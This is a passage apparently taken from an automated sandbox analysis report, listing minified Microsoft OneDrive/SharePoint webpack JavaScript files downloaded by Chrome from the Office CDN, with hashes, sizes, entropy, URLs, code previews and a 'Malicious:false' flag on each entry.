                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[86],{415:(e,t,n)=>{n.r(t),n.d(t,{ContextualMenu:()=>a.v2H});var a=n("fui.lco_35")}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8538)
                              Category:downloaded
                              Size (bytes):35015
                              Entropy (8bit):5.361549307078073
                              Encrypted:false
                              SSDEEP:
                              MD5:BD105FD9BA772E8992F2352F6E8A9B7B
                              SHA1:29E4C01464ABD0D3B38E28AF406938413D2A7004
                              SHA-256:6393348BE2282A6C51C3AB98F99E0A39CEEFC752A537FFC025813CA8108BCCEF
                              SHA-512:C997CA2E73F6913E2FAA30000A35D33A651EF7A76D70FA27EE282405D92CF75EE0505725A5B79DB1A0246AC6CF0B77C95342B06AE35FE359FCDBE537E89801CB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/61.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[61],{1562:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>r});var a=n(181),i="32445A47-9E5D-4A63-A6FB-B8AF2225D90B",r=function(){function e(){this._allClientStatus=new Map,this._allUsers=new Map,this._clientUsers=new Map,this._userClientIds=new Map,this._pendingClientLeaveIds=new Set,this._interactiveClients=new Set,this._subscribers=new Set}return e.prototype.initPresenceStore=function(e){var t,n,i,r,o,s,c=this,d=e.clientInfos;if(d&&d.length>0)for(var l=0;l<d.length;l++){var u=d[l].client.clientId,f=d[l].lastUpdate,p=d[l].client.user.objectId,m=d[l].client.user;u&&f&&(null===(t=this._allClientStatus)||void 0===t||t.set(u,f)),m&&(null===(n=this._allUsers)||void 0===n||n.set(p,m),null===(i=this._clientUsers)||void 0===i||i.set(u,m),this._addUserClientId(p,u)),d[l].client.clientType!==a.a.nonInteractive&&(null===(r=this._interactiveClients)||void 0===r||r.add(u))}(null===(o=this._pendingClientLeaveIds)||void 0===o?void 0:o.size
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4133)
                              Category:downloaded
                              Size (bytes):4138
                              Entropy (8bit):5.3481454436724905
                              Encrypted:false
                              SSDEEP:
                              MD5:143D9F1763B59868E207EFCA23DE9988
                              SHA1:4C4AF09F6079B690BBD8702920BB1E8C7CF8491B
                              SHA-256:776D964E8220E602970BA5597E70082ABA0257DA1443D42691CFE4B767D042C7
                              SHA-512:4BB7F56773B94F7727CA0223BF2707F19EF6738C5102ED816A106AB465022BADD7ED6161CD9ED21FB6297838C30A6371DC3443FE3146053DA6D06D718BAEEA94
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/586.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[586],{3480:function(e,t,n){n.r(t),n.d(t,{default:function(){return C}});var a=n("tslib_102"),i=n(2116),r=n(1786),o=n(924),s=n(2273),c=n(925),d=n(2283),l=n(14);(0,n("fui.util_150").pZ)([{rawString:".od-RemoveFromSharedList-Status{padding-top:5px}.od-RemoveFromSharedList-Status--error{color:"},{theme:"error",defaultValue:"#a80000"},{rawString:"}.od-RemoveFromSharedList-SubText{padding-bottom:5px}html[dir=ltr] input.od-isSpam{margin-right:5px}html[dir=rtl] input.od-isSpam{margin-left:5px}"}]);var u=n(2089),f=n(7026),p=n(475),m=function(e){function t(t){var n=e.call(this,{})||this;n.allowSpam=!!t.isSpam,n.isSpam=t.isSpam,n.status=t.status,n.hasError=t.hasError;var a=t.selection;return t.hasError()?n.subText="":t.removeAccess?n.subText=a.length>1?f.n:a[0].type===p.a.Folder?f.j:f.f:n.subText=a.length>1?f.m:a[0].type===p.a.Folder?f.i:f.e,n.spamText=a.length>1?f.l:a[0].type===p.a.Folder?f.h:f.d,n}return(0,a.XJ)(t,e),
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (50339)
                              Category:downloaded
                              Size (bytes):709150
                              Entropy (8bit):5.348600652333712
                              Encrypted:false
                              SSDEEP:
                              MD5:3D8A69505A47A3B2DC5AA58B44DFEE14
                              SHA1:CC819D7D3C71BFC46DF62599028A9F4A8E8205C8
                              SHA-256:9F3B7BAC9A24ED8F038C93DA1144F9FB6BD2B0F04C11D66EE01AA31CA568B322
                              SHA-512:FF11151E7C0D33AB27955F120440500C489C41025B97CD36A620A806AE0975E1B88FFDDD6019BA71A89863B5C4F4C08144F9AEC780243FA9B1DD3BBAF86CDDC1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/9.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[9],{1152:(e,t,n)=>{n.d(t,{a:()=>f});var a=n("tslib_102"),i=n("fui.lcoms_307"),r=n("fui.lco_35"),o=n(1291),s=n("odsp.util_578"),c=n("react-lib"),d=n(1290),l=n(2087),u=s.HW.isActivated("024eb126-5286-4452-8769-7540475c6eda","02/29/2024","Fix focus issue where after exiting the dialog, the focus is not returned to the element that opened the dialog."),f=function(e){var t=e.onConfirm,n=e.onCancel,s=e.defaultToYes,f=void 0!==s&&s,p=e.defaultFocusToYes,m=void 0!==p&&p,_=e.yesText,h=void 0===_?l.b:_,b=e.noText,g=void 0===b?l.a:b,v=e.showNoButton,y=void 0===v||v,S=e.yesClassName,D=e.noClassName,I=function(e){u&&e&&e.focus()},x=f?i.FPE:i.jvp,C=f?i.jvp:i.FPE,O=m?void 0:I,w=m?I:void 0,E=(0,r.dBO)("NoButton"),A=(0,r.dBO)("YesButton");return c.createElement(d.a,null,c.createElement(r.L$c,{scopedSettings:o.a},c.createElement(i.kD6,(0,a.W_)({styles:e.styles,dialogContentProps:{type:r.r_c.close,styles:e.contentStyles,subText
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1863)
                              Category:downloaded
                              Size (bytes):1868
                              Entropy (8bit):5.152591333497083
                              Encrypted:false
                              SSDEEP:
                              MD5:A00000536B350282DDFD78FBFC834AEE
                              SHA1:8764368FEA266EB587E7FF113738F75D131DB66F
                              SHA-256:62E8E5E03AD470D357A64EC8C4F57ED5A62A62127367FE01A5EFAB683438F013
                              SHA-512:73F123F124DE10FC30123DEDCCFD9FE9A876580B9EEB99CD61D3E47B015D38AC5A5717A9D3F4A247D2D4253D2A9264D11F09DB3F4CD275F1DD79B918313EEE34
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/258.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[258],{1828:(e,t,n)=>{n.r(t),n.d(t,{stagingListItemHelperKey:()=>f});var a=n("odsp.util_578"),i=n(136),r=n(179),o=n(17),s=n("tslib_102"),c=n(222),d={};function l(e,t){var n;(0,c.b)(e,t);var a=d[e]=(null!==(n=d[e])&&void 0!==n?n:-1)+1;return t.ID="".concat(e,"-").concat(a),t}var u=function(){function e(e){this._stagedItemKeySet=new Set,this._getItemKey=e.getItemKey,this._listItemStore=e.listItemStore,this._getListItemProvider=e.getListItemProvider}return e.prototype.getStagedItemKeys=function(){return Array.from(this._stagedItemKeySet)},e.prototype.stage=function(e,t,n){for(var a=[],i=0,r=n;i<r.length;i++){var o=r[i];o=l(t,o);var s=this._getItemKey(o);a.push(s),this._stagedItemKeySet.add(s)}return this._listItemStore.addNewItems(e,n),a},e.prototype.unstage=function(e,t){void 0===t&&(t=this.getStagedItemKeys());for(var n=0,a=t;n<a.length;n++){var i=a[n];this._stagedItemKeySet.delete(i)}this._listItemStore.delete
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (7616)
                              Category:downloaded
                              Size (bytes):59876
                              Entropy (8bit):5.040348646902907
                              Encrypted:false
                              SSDEEP:
                              MD5:54DDF8566213803EA2176468C1C1FB3E
                              SHA1:26178ACCEE8075BAE9F943756347E38B4E2B869D
                              SHA-256:FDF912143D19BAC9D5995F25960A86198221B2A765C0CA9492AD08952445422C
                              SHA-512:7D179810C4380ADA5EE51D9F9EEE839F11BE7349D626628FFE44D97EEAC9161B53E48120EB0C3B5A04A6E3ED6C496ADD4008E78E3BBFE89836DE8C6617C4B52B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3866)
                              Category:downloaded
                              Size (bytes):3871
                              Entropy (8bit):5.372566793011562
                              Encrypted:false
                              SSDEEP:
                              MD5:309AA574C1D3216D14F0045D7976A2B0
                              SHA1:8040C2E69DDD4C5F5512E6F8EC3067D85C44F378
                              SHA-256:C5DF630096C8E0F26309B9F36957B867FF0E01F028CEFF9F10776C5BA9913903
                              SHA-512:18F5874AE899A77787C2A33274525EFAE011CC82BDE0966F2D2888B49F614AA6E26FAE2F319DBA6AF5C2753C138A857D3AE14DC5C228ABCBF18E9F73C1DE5F06
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/102.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[102],{714:(e,t,n)=>{n.r(t),n.d(t,{SuiteNavDataUpdater:()=>p,default:()=>_,resourceKey:()=>m});var a=n("tslib_102"),i=n(2308),r=n(304),o=n("odsp.util_578"),s=n(56),c=n(5),d=n(15),l=n(61),u=n(16),f=(new o.qT("app.admin"),new o.qT("app.spourl")),p=(new o.qT("app.suitenavrendered"),function(){function e(e,t){this._resources=t.resources,this._pageContext=t.pageContext}return e.prototype.updateSuiteNavData=function(e){var t=(0,a.W_)({},e.suiteNavData);this._suiteNavContext=e.suiteNavContext;var n=this._pageContext.isSPO;t.CurrentMainLinkElementID=this._suiteNavContext.currentMainLinkElementID,t.ActionsMap={};var o=this._resources?this._resources.consume(f.optional):void 0;if(o)for(var s=0,c=(0,a.AE)((0,a.AE)([],t.AppsLinks||[],!0),t.WorkloadLinks||[],!0);s<c.length;s++){var d=c[s];if("ShellSites"===d.Id){o.set(d.Url||"");break}}if(n&&this._pageContext.isAnonymousGuestUser)try{var p={Text:this._pageContext.userDispl
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (60481)
                              Category:downloaded
                              Size (bytes):454156
                              Entropy (8bit):5.42338497953956
                              Encrypted:false
                              SSDEEP:
                              MD5:3F3689C320EE4C04C5F6D96A93FDC072
                              SHA1:62CF495D0D7B469F3C69C527443E021ECDF1F5EF
                              SHA-256:3531E8461CCFD9C03EDA802393E07069E89EE76B214CF4882F99C19C61EF42D6
                              SHA-512:63D74DB2F3B81190AFF3ACB28DD34A25DF991638BE838A702799E3471E54F6463FC92D5EBD8C1BF9DA467006492A7FCF76C53D7901D8A9EC6F56AA53B9C61FE9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/plt.filebrowserdataprefetch.js
                              Preview:/*! For license information please see plt.filebrowserdataprefetch.js.LICENSE.txt */.var __webpack_result__;(()=>{var e={175:(e,t,n)=>{"use strict";n.d(t,{a:()=>a});var a={accdb:{extensions:["accdb","mdb"]},archive:{extensions:["7z","ace","arc","arj","dmg","gz","iso","lzh","pkg","rar","sit","tgz","tar","z"]},audio:{extensions:["aif","aiff","aac","alac","amr","ape","au","awb","dct","dss","dvf","flac","gsm","m4a","m4p","mid","mmf","mp3","oga","ra","rm","wav","wma","wv"]},calendar:{extensions:["ical","icalendar","ics","ifb","vcs"]},classifier:{extensions:["classifier"]},clipchamp:{extensions:["clipchamp"]},code:{extensions:["abap","ada","adp","ahk","as","as3","asc","ascx","asm","asp","awk","bash","bash_login","bash_logout","bash_profile","bashrc","bat","bib","bsh","build","builder","c","cbl","c++","capfile","cc","cfc","cfm","cfml","cl","clj","cls","cmake","cmd","coffee","config","cpp","cpt","cpy","cs","cshtml","cson","csproj","css","ctp","cxx","d","ddl","di","disco","dml","dtd","dtml","el
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2408)
                              Category:downloaded
                              Size (bytes):5831
                              Entropy (8bit):5.258751191100057
                              Encrypted:false
                              SSDEEP:
                              MD5:79BFC4007FC1CCC7B11FEB2233718499
                              SHA1:206EB26CDE8FA64BDE08630B7627A2E8EC48FF2C
                              SHA-256:F3A77F72AD07EE9DAF5E6E55A2DB79390B1CAD2617FCD9379D8F59191319BFF1
                              SHA-512:23809C9139C6FBBA3B74BAB6094B5A9C9B3CDEB1C7D3BF8C079398472C6E8C6B28017E86556FE5F5A67DDD615E68447D76180C5825C25ACD9B5B63A1E283022E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/606.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[606],{2779:function(e,t,n){var a,i;n.d(t,{a:function(){return a},b:function(){return i}}),function(e){e.Adobe="adobe",e.Docusign="docusign"}(a||(a={})),function(e){e.Adobe="AdobeSign",e.Docusign="DocuSign"}(i||(i={}))}.,4939:function(e,t,n){n.r(t);var a=n("tslib_102"),i=n(2095),r=n(23),o=n(14),s=n(143),c=n(60),d=n(2100),l=n(4672),u=n(2678),f=n(112),p=n(920),m=n(2711),_=n(2565),h=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this;a.name="SendForSignature",a._itemSelectionHelper=new(a.child(d.a))({allowMultiSelect:!1,canFallback:!1,overrideItem:t.item});var i=n.isEsignPaneExpanded,r=void 0===i?a.resources.consume(u.resourceKey):i,o=n.engagement,s=void 0===o?a.resources.consume(p.a):o;return a._isEsignPaneExpanded=r,a._engagement=s,a}return(0,a.XJ)(t,e),t.prototype.onIsAvailable=function(){var e=this._itemSelectionHelper.firstItem();if(!e)return!1;var t=this.resources.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (48918)
                              Category:downloaded
                              Size (bytes):52519
                              Entropy (8bit):5.334751096111666
                              Encrypted:false
                              SSDEEP:
                              MD5:318D69A7EC1398CB7557081631B4420E
                              SHA1:5B975A00B1F347F8E4995D5AE38FF83BCCAE115A
                              SHA-256:568D35416474C9F34D90A1FE06C2F85E6FC71C7BB1540A8D66FE0475C302B741
                              SHA-512:FCA9D4B2574E6C35B26781E9C1BCDAB1E81D9D2A78AF615604FAE8EB884216008482EC84F78C843C36D33032745E9D5368CA376B77B72FCF817F44526D940EF0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/101.js
                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[101],{4684:function(e){self,e.exports=function(){"use strict";var e,t,n,a={682:function(e,t,n){n.d(t,{Jh:function(){return r},XA:function(){return o},mG:function(){return i},pi:function(){return a}});var a=function(){return a=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i in t=arguments[n])Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i]);return e},a.apply(this,arguments)};function i(e,t,n,a){return new(n||(n=Promise))(function(i,r){function o(e){try{c(a.next(e))}catch(e){r(e)}}function s(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?i(e.value):(t=e.value,t instanceof n?t:new n(function(e){e(t)})).then(o,s)}c((a=a.apply(e,t||[])).next())})}function r(e,t){var n,a,i,r,o={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return r={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(r[Symbol.iterator]=function(){return this}),r;function s(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):186
                              Entropy (8bit):5.2633482452225415
                              Encrypted:false
                              SSDEEP:
                              MD5:C12D464D4E124647EAB908723E8464AA
                              SHA1:D8FA726549D75FC590D47EBF176FC66A127C24CB
                              SHA-256:CC97BD3C3EF1BCC6B1AA4E43DC6A8FC5202C26EBA980F6282CBC470AAF45366F
                              SHA-512:2C4363F88A34285F9BF18AF535F191789A31801700E8A1D48EEB6CDB2B3C1BF9A816BDD527D4C8051D6438931AB7D05F0C2943360124DBF78AB891BFF0CBF3B5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/161.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[161],{1953:(e,t,n)=>{n.r(t);var a=n("react-lib"),i=n("react-dom-lib");window.React=a,window.ReactDOM=i}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (13197)
                              Category:downloaded
                              Size (bytes):13202
                              Entropy (8bit):5.3258831394380985
                              Encrypted:false
                              SSDEEP:
                              MD5:0B63D6E5E2AA1CC467F3A6E31100CDCE
                              SHA1:07A9323283AE558A9466ABC8DB5924DE0108B4D3
                              SHA-256:5B877C6A87E15FF6C6FC41E34147F845807F07EA760CEF09139BA5C93C0E6A8C
                              SHA-512:C26ECA18B944A4CB5109A25C8152AB13CAFF1E6B7AC5570259E11FCA14A1FC0E7AD823366DA910C55DB75C306F05F7991A618E0EF1FD0531DA7E253B8E26BE41
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/193.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[193],{2003:(e,t,n)=>{n.r(t),n.d(t,{internalEnvTasksKey:()=>Z,showBlockingPerfReport:()=>$});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(120),o=n(1),s=n(0),c=n(6),d=n(13),l="DebugWindow_AutoOpen",u=(0,d.a)({loader:function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,n.e(166).then(n.bind(n,2037))];case 1:return[2,e.sent().DebugPanel]}})})}});function f(){var e=(0,s.i)("true"===window.sessionStorage[l]),t=e[0],n=e[1],a=(0,c.a)(function(e){"`"!==e.key||!e.ctrlKey&&!e.altKey||e.shiftKey||n(!t)});return(0,s.c)(function(){return document.body.addEventListener("keyup",a),function(){document.body.removeEventListener("keyup",a)}},[]),(0,s.c)(function(){window.sessionStorage[l]=t.toString().toLowerCase()},[t]),t?(0,o.h)(u,null):null}var p=n(107);(0,n("fui.util_150").pZ)([{rawString:".perfButton{position:absolute;right:34px;bottom:0;z-index:9999;displ
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (17191)
                              Category:downloaded
                              Size (bytes):42742
                              Entropy (8bit):5.2678207184133266
                              Encrypted:false
                              SSDEEP:
                              MD5:F328CC1F9AED8FB7EF6701A4E459A0F3
                              SHA1:B09708FF273317EE062F98D7161D81F0AA8A8496
                              SHA-256:B4CFE660C80A1F7B2DC630C809D153225275B947259CC71149429A226267C183
                              SHA-512:6A5AB448D68B956E62A48C3F4D1CE898B1E66C5A1ECF93636D6BAEE9D299F02237E2492CD941399211382A3F4C383BADE6E6376A9383F6C13859453CCEDF545E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/12.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[12],{2165:function(e,t,n){var a=n("tslib_102"),i=n(2091),r=n("fui.util_150"),o=n(2117),s=function(e){function t(t){var n=e.call(this,t)||this,a=t.valueAccessor(),i=function(e){return"object"==typeof e}(a)?a:{close:a},r=i.timeout,s=void 0===r?1e3:r,c=i.close,d=i.isAutomatic,l=void 0!==d&&d,u=i.isOpen,f=i.isEnabled,p=void 0===f||f,m=i.dismissOnResize,_=void 0!==m&&m,h=i.dismissOnScroll,b=void 0!==h&&h,g=i.useLocalEvents,v=void 0!==g&&g,y=i.disableEscape,S=void 0!==y&&y;n._options={timeout:s,close:c,isAutomatic:l,isOpen:u,dismissOnResize:_,dismissOnScroll:b,useLocalEvents:v,disableEscape:S};var D=n.observables;return n._isAutomatic=D.wrap(l),n._isEnabled=D.wrap(p),n._isActive=D.create(!0),n._isOpenAndNotActive=D.pureCompute(n._computeIsOpenAndNotActive),D.backgroundCompute(n._computeDismissIfOpenAndNotActive).extend({rateLimit:{timeout:n._options.timeout,method:"notifyWhenChangesStop"}}),n._options.isOpen&&D.bac
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6308)
                              Category:downloaded
                              Size (bytes):49955
                              Entropy (8bit):4.9409619974042025
                              Encrypted:false
                              SSDEEP:
                              MD5:E93EB98975108E897133C3642CC6471D
                              SHA1:13FB06418B9DF739CE3542A3A0E0779CB088226C
                              SHA-256:BE28C7ED2EC13BB3A210AFA62585B3B03045BE1AE5192E5920CA45E808DFA590
                              SHA-512:4A740B1065909D26875B519442F537390C0AFAD55A80EA0D9B7F81C020CE463CAD71E5C56D23BEACE8A2B24AF7A7F94AC80D7C63A9CFFFE2F0D0F54E48DE6906
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3813)
                              Category:downloaded
                              Size (bytes):3818
                              Entropy (8bit):5.1698694516615
                              Encrypted:false
                              SSDEEP:
                              MD5:91969031C5E3C20B1C01BAB5161719E7
                              SHA1:006402FA6F000676364E1617B21E0562E48A658A
                              SHA-256:0F718FAE368AAAC725A5770095EDF858A3581244E298686D1334FE9BA88F83A9
                              SHA-512:EDA68F0D1631ED5C7223B91C7C53B3E5C7551B009AE7E50AE9422B4E7C64D5B1681882F16D12EE153C2C30218DFC3962DDF007ECD63020C69E5F2123702555AD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/68.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[68],{735:(e,t,n)=>{n.r(t),n.d(t,{onMouseDown:()=>s,onMouseMove:()=>c,onMouseUp:()=>d});var a=n("fui.lcom_959"),i=n(613),r=n(12),o=n("odsp.util_578").HW.isActivated("36259d23-e405-413e-a108-c918cf59a880");function s(e,t){var n=e.rootRectRef,a=e.scrollTopRef,i=e.scrollLeftRef,r=e.setIsMarqueeInProgress,o=e.selectedIndiciesRef,s=e.rootRef,d=e.scrollableSurfaceRef;r(!0),o.current={},s&&s.current&&(n.current=s.current.getBoundingClientRect(),d&&d.current&&(a.current=d.current.scrollTop,i.current=d.current.scrollLeft),c(e,t))}function c(e,t){var n,r=e.dragOriginRef,o=e.lastMouseEventRef,s=e.isMarqueeInProgress,c=e.rootRectRef,u=e.scrollableSurfaceRef,f=e.scrollLeftRef,p=e.scrollTopRef,m=e.rootRef,_=e.itemRectCacheRef,h=e.selectedIndiciesRef,b=e.allSelectedIndicesRef,g=e.addItemToSelection,v=e.removeAllFromSelection,y=e.dragRectRef,S=e.setIsDragRectangleVisible;if(s){void 0!==t.clientX&&(o.current=t);var D=function(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (22797)
                              Category:downloaded
                              Size (bytes):45267
                              Entropy (8bit):5.284701630137805
                              Encrypted:false
                              SSDEEP:
                              MD5:C8C54440BA4E18D50660EAC522DFB425
                              SHA1:81214BD9F7BF1C9E0CEE0FCF5EFA825FBEE4E2C8
                              SHA-256:E288A41B96FC28738595A1FE5E900381CD3338EB7B96A276BEB0612FBF4C263D
                              SHA-512:7C25A1051C64BE50C5A738AD888562302683FDD92B6AD1C178C83ECA1332363A38ECCC20481817C1DB8D1E3394C3A1B53864F4FF7D714E3067886357A048FCCB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/260.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[260,81],{811:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>x,c:()=>i,d:()=>f,e:()=>l,f:()=>c,g:()=>d,h:()=>u,i:()=>a,j:()=>m,k:()=>p,l:()=>_,m:()=>h,n:()=>g,o:()=>v,p:()=>y,q:()=>S,r:()=>b,s:()=>I,t:()=>D});var a,i,r=n("react-lib"),o=n("fui.lco_35");!function(e){e[e.From530_Below=530]="From530_Below",e[e.From531_To849=849]="From531_To849",e[e.From850_Above=850]="From850_Above"}(a||(a={})),function(e){e[e.Week=0]="Week",e[e.Month=1]="Month",e[e.Day=2]="Day",e[e.WorkWeek=3]="WorkWeek"}(i||(i={}));var s=320,c=96,d=100,l=75,u=75,f=7,p="HH:mm",m="hh:mm tt",_="en-US",h=o.ijR.Sunday,b=0,g=!0,v=function(e){},y=function(e){},S=function(e){},D={},I="0111110",x=r.createContext("")}.,819:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_102"),r=n("react-lib"),o=n("fui.lcoms_307"),s=n(21),c=n("odsp.util_578");function d(){return!c.HW.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.P)({ODB:61241})}var l,u=function(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4143)
                              Category:downloaded
                              Size (bytes):6361
                              Entropy (8bit):5.259698895041888
                              Encrypted:false
                              SSDEEP:
                              MD5:A045C7480F6836B2F56DBE0592007305
                              SHA1:DCC39603270FC3660ED0D57D1951D9AB621A6A38
                              SHA-256:B1FB06751342EC8650BECA7A3EE0A820492CEE186CC4CD49520B23B3ADED8DFE
                              SHA-512:B8CDEC513DC9728E96C85C67418EB4CABE795CBBCF7182B56C1DCD89CE01067E802C103219DE0647E94A6CE32543C5AB9D173CC06665D42E2B9BEA100F5705A4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/7.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[7],{2276:function(e,t,n){n.d(t,{a:function(){return D}});var a,i=n("tslib_102"),r=n(2091),o=n(2088),s=n(115),c=n("odsp.util_578"),d=n(1282),l=n(2509),u=n(169),f=n(26),p=n(14);!function(e){e[e.none=0]="none",e[e.queue=1]="queue",e[e.server=2]="server"}(a||(a={}));var m=a,_=(n(89),(0,u.a)({eventName:"ImageLoad,Qos,",shortEventName:"ImageLoad"},{loadType:{typeRef:a,type:f.a.Enum}},p.a)),h=n(2684),b=n(69),g=!c.HW.isActivated("C123FC1B-1706-4C97-AFF3-45C077654F1A","08/11/2022","Enable not pre-auth vroom style image preview"),v=function(e){function t(t,n){var a=e.call(this,t,n)||this;return a._semaphore=new l.a(16),a._thumbnailCache=n.thumbnailCache,a}return(0,i.XJ)(t,e),t.prototype.loadImage=function(e){var t=this,n=e.url,a=e.imageElement,i=void 